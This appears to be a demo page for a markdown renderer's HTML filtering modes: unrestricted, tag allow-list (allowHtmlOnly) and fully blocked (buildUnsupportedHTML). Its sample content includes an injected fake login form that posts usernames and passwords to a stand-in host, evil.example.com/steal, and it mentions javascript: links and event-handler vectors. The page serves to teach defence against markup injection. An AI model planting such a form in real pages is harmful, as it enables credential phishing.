FIG-001/ UNRESTRICTED

allow all html.

Every HTML tag survives into the DOM. Iframes load, forms render, styles apply — only safe with content you fully trust.

  • Default behaviour — every HTML tag is rendered through its built-in renderer including iframe, form, and style.
  • Only safe for content you fully trust. Untrusted markdown can inject phishing forms, redirect users, or load tracking pixels.
POLICY / UNRESTRICTED trusted content only

HTML Filtering Demo

This paragraph has bold and italic markdown formatting.

This is inside a trusted HTML div element.

HTML strong tag and HTML em tag.

Click to expand Hidden content inside details/summary tags.
Fake login injected by untrusted markdown
FIG-002/ SAFE-ONLY

allow only safe tags.

Allow-list a tight set of formatting tags via allowHtmlOnly. Script, iframe, and anything else dangerous drops silently.

  • Pass a tag allow-list to allowHtmlOnly: only those tags render as elements, and every other tag is neutralised. In the demo below the injected iframe and login form reach the page only as inert text, never as a live frame or form.
  • The right default for user-generated content. Keeps formatting like <strong>, <em>, and <a> while killing script + iframe vectors. A tag allow-list on its own says nothing about attributes, though: an allowed <a> can still carry href="javascript:..." and any allowed tag can carry an onclick or similar event handler, so filter attributes and URL schemes alongside the tag names.
POLICY / SAFE ONLY allowHtmlOnly

HTML Filtering Demo

This paragraph has bold and italic markdown formatting.

This is inside an allowed HTML div element.

HTML strong tag and HTML em tag.

Click to expand Hidden content inside details/summary tags.
<iframe src="https://example.com" title="example iframe"></iframe><form action="https://evil.example.com/steal" method="POST">Fake login injected by untrusted markdown<input type="text" placeholder="Username"><input type="password" placeholder="Password"><button type="submit">Sign in</button></form>
FIG-003/ BLOCKED

block all html.

Treat every HTML tag as unsupported via buildUnsupportedHTML: markdown formatting still renders, but raw HTML is never turned into elements.

  • buildUnsupportedHTML() returns a renderer map that treats every HTML tag as unsupported, so no tag becomes a DOM element. Only markdown formatting survives; in the demo below the raw markup shows up verbatim as literal text.
  • Best when the source is a markdown editor with no need for raw HTML. Smallest attack surface, predictable output.
POLICY / HTML BLOCKED buildUnsupportedHTML

HTML Filtering Demo

This paragraph has bold and italic markdown formatting.

<div> This is inside a raw HTML div element. </div>

<strong>HTML strong tag</strong> and <em>HTML em tag</em>.

<details><summary>Click to expand</summary> Hidden content inside details/summary tags. </details><iframe src="https://example.com" title="example iframe"></iframe><form action="https://evil.example.com/steal" method="POST"><strong>Fake login injected by untrusted markdown</strong><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button type="submit">Sign in</button></form>

HTML Filtering